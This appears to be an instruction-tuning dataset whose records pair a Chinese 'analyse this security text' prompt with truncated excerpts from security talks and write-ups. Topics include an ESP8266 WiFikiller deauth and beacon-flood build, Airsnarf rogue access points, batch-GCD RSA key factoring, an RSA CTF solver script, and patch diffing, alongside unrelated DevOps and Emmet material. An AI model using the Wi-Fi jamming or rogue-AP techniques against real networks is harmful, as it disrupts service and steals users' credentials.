{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# WiFikiller > 文章作者 [Sarah-Briggs](https://github.com/Sarah-Briggs) & [Atomic-Crash](https://github.com/Atomic-Crash) & [r0fus0d](https://github.com/No-Github) --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 简介 考虑到过往比赛的场景中有部分参赛者使用手机热点共享给笔记本从而上网查阅资料破坏比赛的公平性这次考虑制作一个 WiFikiller它的功能有攻击 wifi这可以致使该 wifi 在这个区域内所有用户都无法连接也可以批量复制 wifi例如将一个 wifi 复制 20 份这样手机就会搜到 20 个一样的 wifi由于比赛时间紧迫鉴于以上的功能参赛者短期之内是无法破解的该工具也辅助了比赛的公平性 由于 ESP8266 是开源项目网上有 wifikiller 各类固件源码对于学习和制作非常的方便不过功能大同小异这里就不附链接地址该模组烧录钓鱼项目源码也可以用作钓鱼或者别的固件源码也可以用于破解 wifi 密码这里硬件电路由我自己手工焊接不采用 PCB 印刷 (PCB 印刷板体积会更小外观更美观缺点就是价格略贵制作需要时间)焊接好硬件电路以后烧录程序接着就是调试电路 (烧录程序和调试电路会比较耗时同时也很需要经验)最后的成品大概巴掌大小自带电源 (可充电)非常的便携 ` 免责声明该 WiFikiller 工具仅用于学习和交流使用若用作其他用途造成违法和财产损失与本人无关` `该文档较长想学习制作请耐心读下去想直接使用以及了解原理可以直接跳过硬件和调试部分` --- ## 硬件准备 1. 68的印刷万用板1300mah聚合物电池一块(尺寸是102540)微动按钮三个微动开关一个 2. 0.96 OLED屏幕一块ESP8266串口wifi模块micro usb充电模块一个 3. 电烙铁焊锡丝导线若干热熔胶枪 `注意因为该电路板比较小所以拼合比较紧凑微动开关和OLED屏幕都是经过电磨机打磨过后才能装配上去` ### 硬件布局 & 焊接 硬件接线图 1. 首先作为一个需要进行按键操作的设备这个必须要合理的布局排版要适合人的操作习惯同时不能影响各方面的使用所以在这里我将所有的开关按键布局到右侧 (考虑大部分人是用右手) 2. ESP8266 串口 wifi 模块供电口micro usb 充电模块的充电口设置到同一位置以便充电和调试的同时不影响按键的使用因为右边都是开关和按键为了保护屏幕不受到损伤需要避开经常按动的位置在此基础上 OLED 屏幕就只能放在板子的左上角还有一个细节就是微动开关的开是向上拨动也是为了电路的安全性考虑向下拨动方便快速断开电源以上就是本人电子类技术长期积攒下来的部分经验之谈 图下主要是全部的硬件材料 3. 先进行板子布局因为电路没有设置短路保护而且充电模块紧贴ESP8266串口wifi模块为了保险起见先进行充电模块焊接与测试 4. 在焊接完以后进行充电测试在测试中发现充电模块虽然发热但是在可接受范围之内充电模块和聚合物电池能够正常工作并且电量已经充满 5. 进行最后的总线路焊接下图附成品因为是飞线所以外观上不如pcb的美观强度也不如pcb高但不影响功能使用注意用热熔胶枪加固电池和充电模块 --- ## 程序烧录 1. 先安装烧录所需要的环境CH341SER.exe, 安装好之后在运行 ESP8266Flasher.exe 这个程序进行烧录只需要一个根 micro 数据线即可以下是详细的烧录方法 ` 注意参考 ESP8266 串口 wifi 模块背板上的烧录速率 ` ### 基础调试 1. 烧录程序以后进行开机调试我们先简单试一下按键功能看一下按键是否能够正常使用屏幕显示是否工作正常` 第一次开机屏幕要过一会才亮耐心等待因为内部在加载和初始化程序 ` 经过以上说明按键正常工作(按键功能和板子插口已经在图上标明)显示屏也显示无误 ### 使用说明 主菜单下主要功能有五大块 1. SCAN(扫描) 在该功能下可以设置扫描 AP+ST单独扫描 APs单独扫描 Stations 2. SELECT(选择 / 设置) 在该功能下可以选择 APsstationsNamesSSIDs 进入 SSIDs 可以设置 CLONE APs(克隆 APs)RANDOM MODE(随机模式)REMOVE ALL(移除所有) 3. ATTACK(攻击) 在该功能下可以选择 DEAUTH(认证攻击)BEACON(洪水攻击)PROBE(探测请求洪水攻击)START(开始) 4. PACKER MON", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Can you read Pacifico? (misc/ppc, 400+1p) ### PL Version [ENG](#eng-version) Zadanie polegało na napisaniu łamacza captchy. Captche miały następujący format: ![](./captcha.png) Należało rozwiązać 1337 kodów pod rząd bezbłędnie w celu uzyskania flagi. Jak nie trudno zauważyć konieczne będzie przetworzenie obrazu do wersji bardziej przystępnej do automatycznej analizy. Stosujemy algorytm, który przetworzy podany obraz do postaci czarnego tekstu na białym tle. Wykonujemy to za pomocą zestawu 2 funkcji: def fix_colors(im): colors_distribution = im.getcolors(1000) ordered = sorted(colors_distribution, key=lambda x: x[0], reverse=True) best_colors = [color[1] for color in ordered] if (255, 255, 255) in best_colors: best_colors.remove((255, 255, 255)) if (0, 0, 0) in best_colors: best_colors.remove((0, 0, 0)) best_colors = best_colors[:2] pixels = im.load() for i in range(im.size[0]): for j in range(im.size[1]): color = pixels[i, j] if color not in best_colors: pixels[i, j] = best_colors[0] return best_colors[0] def black_and_white(im, filling): black = (0, 0, 0) white = (255, 255, 255) pixels = im.load() for i in range(im.size[0]): for j in range(im.size[1]): color = pixels[i, j] if color == filling: pixels[i, j] = white else: pixels[i, j] = black Pierwsza służy do usunięciu z obrazu wszystkich oprócz 2 dominujacych kolorów (którymi jest wypełnienie i tekst), przy czym szukajac dominujących kolorów nie bierzemy pod uwagę białego i czarnego, aby nie wybrać któregoś z nich jako koloru wypełnienia. Druga funkcja zamienia kolor tekstu na czarny a kolor wypełnienia na biały. W efekcie uzyskujemy: ![](./captcha_color.png) A następnie: ![](./captcha_bw.png) Niestety jak nie trudno zauważyć nasze captche są bardzo bardzo małe. Za małe żeby OCR był w stanie poprawnie i bezbłędnie je odczytać. Stosujemy więc inną metodę. Jeden z naszych kolegów poświecił się i zmapował stosowaną czcionkę tworząc pliki z każdym potrzebnym symbolem: ![](./alphabet.png) Algorytm dekodowania captcha", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploitSpotting: Locating Vulnerabilities Out Of Vendor Patches Automatically Jeongwook Oh Sr. Security Researcher WebSense Inc. Defcon 18 August 1st, 2010 Las Vegas, USA Why?  I worked on a security product last 5 years.  The IPS and vulnerability scanner needed signatures  We needed technical details on the patches  The information was not provided by the vendors  In recent years, a program called MAPP appeared from Microsoft, but many times it's not enough  You have two options in this case:  Use your own eye balls to compare disassemblies  Use binary diffing tools  Patch analysis using binary diffing tools is the only healthy way to obtain some valuable information out of the patches. How?  I'll show you whole process for a typical binary diffing  You should grab an idea what binary diffing is  The example shown next will show the typical example of binary diffing process  The patch(MS10-018) is for CVE-2010-0806 vulnerability. Example: CVE-2010-0806 Patch Description from CVE Web Page http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806 Use-after-free vulnerability in the Peer Objects component (aka iepeers.dll) in Microsoft Internet Explorer 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via vectors involving access to an invalid pointer after the deletion of an object, as exploited in the wild in March 2010, aka \"Uninitialized Memory Corruption Vulnerability.\" CVE-2010-0806 Patch Analysis Acquire Patches  Download the patch by visiting patch page(MS10-018) and following the OS and IE version link.  For XP IE 7, I used following link from the main patch page to download the patch file.( http://www.microsoft.com/downloads/details.aspx?FamilyID=167ed896-d383-4dc0-9183- cd4cb73e17e7&displaylang=en ) CVE-2010-0806 Patch Analysis Extract Patches C:\\> IE7-WindowsXP-KB980182-x86-ENU.exe /x:out CVE-2010-0806 Patch Analysis Acquire unpatched files  You need to collect unpatched files from the operating system that the patch is supposed to ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n技 术 标 准 研发运营一体化能力成熟度模型 第 2 部分敏捷开发管理过程 The DevOps capability maturity model Part 2: Agile management process 征求意见稿 2017 年 11 月 18 日 YDB XXXXXXXXX I 目 次 目次!........................................................................................................................................!I 前言!.......................................................................................................................................!II 1! 范围!..............................................................................................................................................!1 2! 规范性引用文件!...........................................................................................................................!1 3! 术语!..............................................................................................................................................!1 3.1$ 黄金圈$ golden$circle$.....................................................................................................................$1 3.2$ 用户故事$ user$story$.....................................................................................................................$1 3.3$ 用户故事地图$ user$story$mapping$..............................................................................................$1 3.4$ 影响地图$ impact$mapping$...........................................................................................................$1 3.5$AB 测试$ ab$test$..............................................................................................................................$1 4! 缩略语!..........................................................................................................................................!2 5! 综述!..............................................................................................................................................!2 6! 敏捷需求管理!......................................................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSITCH Inexpensive, coordinated GSM anomaly detection About Me  2000: Technology career started (I can get paid for this??)  2003: Started building with Linux  Came to infosec through systems and network engineering, integration  Security tools and integration (SIEM, HIDS, etc)  Current: R&D Ashmastaflash Thoughts and opinions expressed are my own. If you take anything away from this talk and act on it, Im not responsible if you go to jail, become a pariah, or your dog stops liking you. Know the laws youre subject to and operate accordingly. What Were Covering Today  Why Care?  Current Threat and Detection Landscape  Project Goals  SITCH: MkI  SITCH: MkII  Service Architecture  Future Plans  Prior Art  Q&A Why Care?  Invasions of privacy are bad, even when theyre unnoticed.  Industrial espionage costs money and jobs. WTF Is Under All That?? Is Anybody Home? Terminology  Software Defined Radio (SDR): Using software to perform signal processing in concert with an adjustable-frequency RF receiver  FCCH: Frequency Correction Channel  ARFCN: Absolute Radio Frequency Channel Number  CGI: Cell Global ID (MCC + MNC + LAC + CI)  IMSI: International Mobile Subscriber Identity GSM Addressing Threat and Detection Landscape  Malicious Devices  Indicators of Attack  Existing Detection Methods Hacked Femtocell Trusted part of providers network Your phone doesnt know its evil Evil BTS Handset will automatically associate, unable to assert trustworthiness Indicators of Attack  ARFCN over threshold  ARFCN outside forecast  Unrecognized CGI  Gratuitous BTS re-association  BTS detected outside of range Existing Detection Methods  Commercial Options:  Pwnie Express  Bastille Networks  Open Source:  Fake BTS  AIMSICD  Femto Catcher Project Goals  Inexpensive (what can I get for $100?)  Small footprint, low power requirements preferred  Functional Targets: Indicators of Attack (IOA) Coverage Tested Hardware (some of it, anyway) Functional Targets  ARFCN over threshold  ARFCN outside of forec", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Emmet date: 2020-12-14 18:28:43 background: bg-[#95c844] tags: - snippets - coding - html - css - abbr categories: - Toolkit intro: | [Emmet](https://emmet.io/) is a web-developers toolkit for boosting HTML & CSS code writing, which allows you to write large HTML code blocks at speed of light using well-known CSS selectors. plugins: - copyCode --- Emmet Syntax --------------- ### Getting started Let us start to improve your development to the speed of light. - [Emmet in Visual Studio Code](https://code.visualstudio.com/docs/editor/emmet) _(code.visualstudio.com)_ - [Emmet 2 for Sublime Text](https://github.com/emmetio/sublime-text-plugin) _(github.com)_ - [Emmet for Coda](https://emmet.io/download/coda/) _(emmet.io)_ - [Emmet for Atom](https://github.com/emmetio/emmet-atom#readme) _(github.com)_ ### Multiplication: * ul>li*5 ```html <ul> <li></li> <li></li> <li></li> <li></li> <li></li> </ul> ``` ### Child: > `nav>ul>li` ```html <nav> <ul> <li></li> </ul> </nav> ``` ### Custom attributes {.col-span-2} p[title=\"Hello world\"] ```html <p title=\"Hello world\"></p> ``` td[rowspan=2 colspan=3 title] ```html <td rowspan=\"2\" colspan=\"3\" title=\"\"></td> ``` [a='value1' b=\"value2\"] ```html <div a=\"value1\" b=\"value2\"></div> ``` ### Text: {} a{Click me} ```html <a href=\"\">Click me</a> ``` p>{Click }+a{here}+{ to continue} ```html {.wrap} <p>Click <a href=\"\">here</a> to continue</p> ``` ### ID and CLASS attributes {.row-span-2} `#header` ```html <div id=\"header\"></div> ``` .title ```html <div class=\"title\"></div> ``` form#search.wide ```html <form id=\"search\" class=\"wide\"></form> ``` p.class1.class2.class3 ```html <p class=\"class1 class2 class3\"></p> ``` ### Implicit tag names {.row-span-2} .class ```html <div class=\"class\"></div> ``` em>.class ```html <em><span class=\"class\"></span></em> ``` ul>.class ```html <ul> <li class=\"class\"></li> </ul> ``` table>.row>.col ```html <table> <tr class=\"row\"> <td class=\"col\"></td> </tr> </table> ``` ### Sibling: + div+p+bq ```html <", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSECURITY & INNOVATION Cyber[Crime|War] Iftach Ian Amit 1 www.securityandinnovation.com Cyber[Crime|War] Linking State Governed Cyber Warfare with Online Criminal Groups Table of Contents Introduction................................................................................................................................1 Background................................................................................................................................2 Cybercrime.................................................................................................................................2 Cyber Warfare............................................................................................................................3 Past Events and Making the Links.............................................................................................3 Estonia ...................................................................................................................................3 Georgia...................................................................................................................................5 Twitter, Google and the APT.................................................................................................6 Conclusion .................................................................................................................................7 Introduction In recent years Cybercrime has been front-page news as a result of an increase in profit- motivated internet crimes; and an apparent lack of sufficient security measures that leave standard internet users virtually unprotected from internet crimes. Software security vendors have been trying to show progress in the fight against cybercrime - with some success. The vast majority of Internet users, however, are still unprotected from internet crime that includes fraud, phishing and identity theft. The success of financial cybercrime has served to fuel further", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport gmpy2 from Crypto.PublicKey import RSA from crypto_commons.generic import bytes_to_long, long_to_bytes from crypto_commons.rsa.rsa_commons import modinv def solve(ct, e, n, padding_len): new_ct = ct * pow(modinv(256, n) ** padding_len, e, n) new_ct %= n for i in range(256): potential_pt, is_cube = gmpy2.iroot(new_ct + (n * i), e) if is_cube: print(i, long_to_bytes(potential_pt)) def main(): flag_size = len(open(\"aes.enc\", 'rb').read()) key = RSA.importKey(open('pubkey.txt', 'rb').read()) ct = open(\"rsa.enc\", 'rb').read() solve(bytes_to_long(ct), key.e, key.n, 128 - flag_size) main()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents A Fully Trained Jedi, You Are Not Adam Shostack #BHUSA @BlackHatEvents How Many Jedi? 2 #BHUSA @BlackHatEvents How Many Jedi? 3 #BHUSA @BlackHatEvents We talk a lot about Jedi 4 #BHUSA @BlackHatEvents Its a Bad Goal Expectations of heroism drive burnout Not everyone wants to be torn from their family as a child  Forced to live without attachments Even if they did, many people just dont qualify 5 #BHUSA @BlackHatEvents  Murdered by Sith Isnt Good 6 #BHUSA @BlackHatEvents A Fully Trained Jedi, You Are Not Adam Shostack #BHUSA @BlackHatEvents About Adam Shostack 8 #BHUSA @BlackHatEvents Agenda  The problem starts with software  Shifting left isnt working  Reasonable Expectations  Bloom  Chunking  Frames 9 #BHUSA @BlackHatEvents Weve known for a while   Firewalls and Internet Security (Cheswick and Bellovin, 1994) 10 #BHUSA @BlackHatEvents Where do security issues come from? Developers 11 #BHUSA @BlackHatEvents Where do security issues come from? Software engineers 12 #BHUSA @BlackHatEvents Developers introduce many problems  Code with security bugs + flaws  Missing security features  Unusable security features 13 #BHUSA @BlackHatEvents Software Application security Operational security Dev Production 14 #BHUSA @BlackHatEvents Software Application security Operational security Dev Prod bugs Firehose of CVEs 15 #BHUSA @BlackHatEvents Software Application security Operational security Dev Prod bugs Pen Test Fuzzing Static analysis XDR SIEM Vuln Scan Reverse engineering Shift Security Left Firewalls! 16 Language improvements Firehose of CVEs #BHUSA @BlackHatEvents Software Application security Operational security Dev Prod bugs Pen Test Fuzzing Static analysis XDR SIEM Vuln Scan Reverse engineering Shift Security Left Firewalls! 17 Firehose of CVEs Language improvements #BHUSA @BlackHatEvents Shift Left  Build security in  Changes to how we/they design, develop, deploy  Requires new skills  Less pen testing  More software engineering  Growing popular", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAirsnarf Why 802.11b Hotspots Aint So Hot. Coming up...  Disclaimer  Example hotspot setup & weakness  Rogue APs  Demo of Airsnarf  Defense strategies Disclaimer  This presentation and example software are intended to demonstrate the inherent security flaws in publicly accessible wireless architectures and promote the use of safer authentication mechanisms for public 802.11b hotspots. Viewers and readers are responsible for their own actions and strongly encouraged to behave themselves. Example HotSpot Setup  Visit hotspot provider website and create login  Visit hotspot with wireless device  Power on, associate, get IP, DNS, etc.  Open web browser and get redirected  Login, backend authentication & billing, welcome to the Internet Is this secure? Access Point SSID: goodguy SSID: badguy Stronger or Closer Access Point ANY Wi-Fi Card SSID: goodguy badguy Rogue APs?  Rogue AP = an unauthorized access point  Traditional  corporate back-doors  corporate espionage  Hotspots  DoS  theft of user credentials  AP cloning Hotspot Rogue AP Mechanics  Create a competing hotspot.  AP can be actual AP or HostAP  Create or modify captive portal behind AP  Redirect users to splash page  DoS or theft of user credentials  Bold attacker will visit ground zero.  Not-so-bold will drive-by with an amp. Airsnarf  Nothing special  Simplifies HostAP, httpd, dhcpd, Net::DNS, and iptables setup  Simple example rogue AP  Demonstration Defense Strategies  Local AP awareness  Customer education  One-time authentication mechanisms  Dont charge for hotspot access? Links  Airsnarf - http://airsnarf.shmoo.com  HostAP - http://hostap.epitest.fi/  Red Hat Kernel w/ HostAP - http://www.cat.pdx.edu/~baera/redhat_hostap/  Looking for hotspots? - http://www.hotspotlist.com/  Other wireless portal software - http://www.personaltelco.net/index.cgi/PortalSoftware Questions?", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSlide 1 Note: The following slides (and speaker notes) are in draft format. Final presentation slides will be made available after both BlackHat and DEF CON. The most significant changes will be in the Machine Learning section. This deck includes results based on Nearest Neighbour (Wekas NNge algorithm). The final deck will change to take into account additional data and alternative models. Slide 2 Predicting Susceptibility to Social Bots on Twitter Chris Sumner & Dr. Randall Wald chris@onlineprivacyfoundation.org & rwald1@fau.edu Welcome to Predicting Susceptibility to Social Bots on Twitter . Im Chris Sumner, representing the Online Privacy Foundation and Im joined by Dr. Randall Wald from Florida Atlantic University. Before we begin, I want to ensure that people are aware of what the talk is and isnt. Whats in it for you - Discuss some research in this area - Social Bots  links to code - Introduction to simple bots to play with - Human Behaviour Psychology - Look at what makes some people do things which other people think are dumb. - Data Mining & Machine Learning - How to collect & analyze data - Implications for security awareness training Slide 3 TP TL;DR TP FP TP TP TP TP FP Targeted Spray & Pray We examined the performance of a Spray & Pray approach to unsolicited social interaction versus a Targeted approach using Machine Learning and the results will look a little like this. Slide 4 Anyone know who this guy is?.... Its Tim Hwang. Slide 5 And back in early 2011 Id stumbled upon this fascinating and amusing competition which he hosted with the Web Ecology Project .it was described as References: - 5 minute video overview - http://ignitesanfrancisco.com/83e/tim-hwang/ - http://aerofade.rk.net.nz/?p=152  Instantly go out and follow all 500 of the target users  every 2-3 hours, tweet something from a random list of messages.  constantly scan flickr for pictures of \"cute cats\" from the Cute Cats group and blog them to James' blog \"Kitteh Fashun\" - (which auto t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBundles of Joy breaking macOS via subverted application bundles @patrickwardle WHOIS @patrickwardle tools, blog, & malware collection \"Objective by the Sea\" (macOS security conference) Book(s): \"The Art of Mac Malware\" In the wild? OUTLINE Background Protection & detection The flaw Patch Topics covered: os internals, reversing, malware analysis, & security tool development. Background how apple seeks to protect macOS users MAC INFECTION VECTORS the vast majority, require user \"assistance\" fake updates poisoned search results & infected sites infected :/ pirated (trojaned) applications THE GROWTH OF MAC MALWARE and apples multi-layer defense more Mac Malware (credit: MalwareBytes) more than Windows !? anti-infection mechanisms (applied to downloaded items) Notarization Gatekeeper File quarantine aim to protect the user from infecting themselves QUARANTINE ATTRIBUTE added to all (ok, most) downloaded items A quarantine attribute is added to downloaded items. When launched, it signifies the item should be subjected to various anti-infection checks. % xattr ~/Downloads/malware.app com.apple.quarantine % xattr -p com.apple.quarantine ~/Downloads/malware.app 0081;606ec805;Chrome;BCCEDD88-5E0C-4F6A-95B7-DBC0D2D645EC Triggers checks: q attr: com.apple.quarantine xattr shows (quarantine) attributes  gatekeeper  notarizations  file quarantine FILE QUARANTINE (2007) user confirmation when launching an application file quarantine prompt (note: \"is an app\") When a user opens a downloaded item, file quarantine displays a prompt that requires explicit user confirmation before allowing the file to execute. a presentation ...or is it malware? (it's OSX.WindTail) Shortcoming: Open GATEKEEPER (2012) block unsigned applications Built atop File Quarantine, Gatekeeper checks the code signing information of downloaded items and blocks those that do not adhere to system policies. Shortcoming: signed malware not mozilla! NOTARIZATION (2019) block non-verified applications malware? clean not", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe mechanics of compromising low entropy RSA keys Austin Allshouse This talk is about... Nominally: Recovering private keys from a subset of vulnerable RSA certificates Functionally: Calculating shared factors across large batches of integers ...using our scalable GCD algorithm for shared factors... ...batch GCD on RSA keys, using a custom distributed version... ...we adapted the batch GCD implementation p x q = n random prime random prime public modulus Hello darkness, my old friend... When primes are reused... p x q1 = n1; p x q2 = n2 gcd(n1, n2) = p n1/p = q1; n2/p = q2 Select past research... 2012 2016 2018 Mining your Ps and Qs... Weaks Keys Remain Widespread... Reaping and breaking keys at scale @DEF CON 26 - Discovered widespread prime reuse in certificates - Demonstrated flaws in pseudorandom number generation - Greatly expanded scope of keys evaluated (81 million) - Detail a method of parallelizing modulus factorization - Industrialized key acquisition and factoring on a massive scale from diverse sources (hundreds of millions) GCD circa 300 BC (Euclid) Prime products: (7 x 67) = 469; (11 x 61) = 671; (7 x 59) = 413; (17 x 53) = 901 from itertools import combinations products = [469, 671, 413, 901] def gcd(a, b): if a == 0: return b return gcd(b%a, a) for pair in combinations(products, 2): print(f'gcd{pair} = {gcd(*pair)}') gcd(469, 671) = 1 gcd(469, 413) = 7 gcd(469, 901) = 1 gcd(671, 413) = 1 gcd(671, 901) = 1 gcd(413, 901) = 1 Batch GCD circa 2004 AD (Bernstein) Product Tree Building: child1 * child2 = parent Remainder Tree Decomposing: parent mod child2 = child Remainder Tree Leaves gcd( remainder/product, product ) = shared_factor Product Tree 117103588987 314699 372113 901 413 671 469 Prime products: (7 x 67) = 469; (11 x 61) = 671; (7 x 59) = 413; (17 x 53) = 901 Remainder Tree 117103588987 117103588987 mod (314699)2 = 18068128386 117103588987 mod (372113)2 = 117103588987 117103588987 mod (901)2 = 482936 117103588987 mod (413)2 = 124313 18068128386 mo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Nmap ## Nmap包描述 Nmap网络映射器是用于网络发现和安全审计的免费和开放源许可证实用程序许多系统和网络管理员还发现它对于诸如网络库存管理服务升级调度以及监视主机或服务正常运行时间等任务很有用Nmap以新颖的方式使用原始IP数据包来确定网络上可用的主机这些主机提供的服务应用程序名称和版本它们正在运行的操作系统和操作系统版本什么类型的数据包过滤器/防火墙正在使用还有几十个其他特性它旨在快速扫描大型网络但对单个主机工作正常Nmap在所有主要的计算机操作系统上运行官方二进制包可用于LinuxWindows和Mac OS X Nmap被Linux JournalInfo WorldLinuxQuestions.Org和Codetalker Digest评为年度安全产品它甚至有十二部电影包括矩阵重装模具硬4女孩与龙纹身和Bourne最后通atum ## Nmap是... - 灵活支持数十种先进技术用于映射填充有IP过滤器防火墙路由器和其他障碍的网络这包括许多端口扫描机制TCP和UDP操作系统检测版本检测ping扫描等请参阅文档页 - 强大Nmap已被用于扫描数十万台机器的庞大网络 - 便携式支持大多数操作系统包括LinuxMicrosoft WindowsFreeBSDOpenBSDSolarisIRIXMac OS XHP-UXNetBSDSun OSAmiga等 - 简单虽然Nmap为高级用户提供了一组丰富的高级功能但您可以简单地从nmap -v -A targethost开始传统的命令行和图形GUI版本都可以满足您的偏好二进制文件可用于那些不希望从源代码编译Nmap的用户 - 免费Nmap项目的主要目标是帮助使互联网更安全一些并为管理员/审计员/黑客提供探索其网络的高级工具Nmap可以免费下载并附带完整的源代码您可以根据许可证条款修改和重新分发 - 良好的文件重大的努力已经投入全面和最新的手册页白皮书教程甚至一整本书在这里找到多种语言 - 支持虽然Nmap不提供保修但它得到了开发人员和用户的充满活力的社区的良好支持大多数此交互发生在Nmap邮件列表上大多数错误报告和问题应该发送到nmap-dev列表但只有在你阅读了指南我们建议所有用户订阅低流量nmap-hackers公告列表你也可以在Facebook和Twitter上找到Nmap对于实时聊天加入Freenode或EFNet上的#nmap频道 - 备受赞誉Nmap赢得了无数奖项包括Linux年报信息世界和Codetalker Digest的年度信息安全产品它已被数以百计的杂志文章几部电影几十本书和一本漫画书系列请访问新闻页了解更多详情 - 热门每天有成千上万的人下载Nmap它包含在许多操作系统Redhat LinuxDebian LinuxGentooFreeBSDOpenBSD等中它是Freshmeat.Net存储库中排名前十的30,000个程序之一这是很重要的因为它给Nmap带来了充满活力的开发和用户支持社区 资料来源http://nmap.org/ [Nmap Homepage](http://insecure.org/) | [Kali Nmap Repo](http://insecure.org/) - 作者Fyodor - 许可证GPLv2 ## nmap软件包中包含的工具 ### nping - 网络数据包生成工具/ ping实用程序 ``` root @ kalinping -h Nping 0.6.40http://nmap.org/nping 用法nping [探测模式] [选项] {目标规格} 目标规范 目标可以指定为主机名IP地址网络等 例如scanme.nmap.orgmicrosoft.com/24,192.168.0.1; 10.0*1-24 PROBE MODES-- tcp-connectUnprivileged TCP连接探测器模式 --tcpTCP探测模式 --udpUDP探测模式 --icmpICMP探测模式 --arpARP / RARP探测模式 --tr--traceroute Traceroute模式只能与TCP / UDP / ICMP模式一起使用 TCP CONNECT MODE -p--dest-port <port spec>设置目标端口 -g--source-port <portnumber>尝试使用自定义源端口 TCP PROBE MODE -g--source-port <portnumber>设置源端口 -p--dest-port <port spec>设置目标端口 --seq <seqnumber>设置序列号 --flags <flag list>设置TCP标志ACKPSHRSTSYNFIN ...--", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLog browsing moves Data organization Examples Entropy-based data organization tricks for browsing logs and packet captures Sergey Bratus Department of Computer Science Dartmouth College Sergey Bratus Entropy tricks for browsing logs and packet captures Log browsing moves Data organization Examples Outline 1 Log browsing moves Pipes and tables Trees are better than pipes and tables! 2 Data organization Trying to define the browsing problem Entropy Measuring co-dependence Mutual Information The tree building algorithm 3 Examples Sergey Bratus Entropy tricks for browsing logs and packet captures Log browsing moves Data organization Examples Disclaimer 1 These are really simple tricks. 2 Not a survey of research literature (but see last slides). You can do much cooler stuff with entropy etc. 3 NOT on-line IDS/IPS stuff: Learning the normal values, patterns. Statistical training  black box oracle. Once trained, hard to understand or tweak. 4 These tricks are for off-line log browsing (analysis). Entropy & friends: What can they do for us in everyday log browsing? Sergey Bratus Entropy tricks for browsing logs and packet captures Log browsing moves Data organization Examples Outline 1 Log browsing moves Pipes and tables Trees are better than pipes and tables! 2 Data organization Trying to define the browsing problem Entropy Measuring co-dependence Mutual Information The tree building algorithm 3 Examples Sergey Bratus Entropy tricks for browsing logs and packet captures Log browsing moves Data organization Examples The UNIX pipe length contest What does this do? grep Accepted password /var/log/secure | awk {print $11} | sort | uniq -c | sort -nr /var/log/secure: Jan 13 21:11:11 zion sshd[3213]: Accepted password for root from 209.61.200.11 Jan 13 21:30:20 zion sshd[3263]: Failed password for neo from 68.38.148.149 Jan 13 21:34:12 zion sshd[3267]: Accepted password for neo from 68.38.148.149 Jan 13 21:36:04 zion sshd[3355]: Accepted publickey for neo from 129.10.75.101 Jan 1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nShellcodes for ARM: Your Pills Dont Work on Me, x86 Svetlana Gaivoronski @SadieSv Ivan Petrov @_IvanPetrov_ Why its important ! ! !Increasing!number!of!ARM3based!devices! ! !Significant!number!of!vulnerable!so:ware! !!!!!!!and!huge!base!of!reusable!code! ! !Memory!corrup?on!errors!are!s?ll!there! @SadieSv!!!!!!!@_IvanPetrov_! Is it decidable? Ac?vator!  NOP!  GetPC! Decryptor! Payload! Return!address!zone! ! !Structure!limita?ons!! ! !Size!limita?ons! @SadieSv!!!!!!!@_IvanPetrov_! May be its not that bad? ! !Stack!canaries:!calculates!pseudo<random! number!and!saves!it!to!the!stack;! ! !SafeSEH:!instead!of!protecDng!stack!protects! excepDon!handlers!;!! ! !DEP:!makes!stack/part!of!stack!non< executable;!! ! !ASLR:!randomizes!he!base!address!of! executables,!stack!and!heap!in!a!processs! adress!space!.! BYPASSED @SadieSv!!!!!!!@_IvanPetrov_! Okay, whats the ARM problem? ! !Shellcodes!are!already! there! ! ! !Shellcode!detec?ons! methods!(okay,&smarter& than&signature3based)!are! not!! Are x86-based methods are applicable here? For analysis of appicapability of х86based techniques for ARM its reasonable to understand differences of two platforms. @SadieSv!!!!!!!@_IvanPetrov_! Main differences of two platforms: ! Commands!size!is!fixed;! ! 2!different!CPU!modes!(32bit!and!16bit)and!possibility!to! dynamic!switching!between!them; ! Possibility!of!condiDonal!instrucDon!execuDon; ! Possibility!of!direct!access!to!PC; ! load<store!architecture!(not!possible!to!access!memory! directly!from!arithmeDc!instrucDons); ! FuncDon!arguments!(and!return!address!as!well)!go!to! registers,!not!stack. @SadieSv!!!!!!!@_IvanPetrov_! i!f!(!e!r!r!!=!0)! !p!r!i!n!t!f!(!\"!Er!r!o!r!c!o!d!e!=!%i!\\!n!\"!,!e!r!r!)!;! e!l!s!e! !p!r!i!n!t!f!(!\"OK!!\\!n!\"!)!;! ! ! !!!!CMP!r1!,!#0! !!!!BEQ!.!L4! !!!!LDR!r0!,!<!string_1_address!>! !!!!BL!prin]! 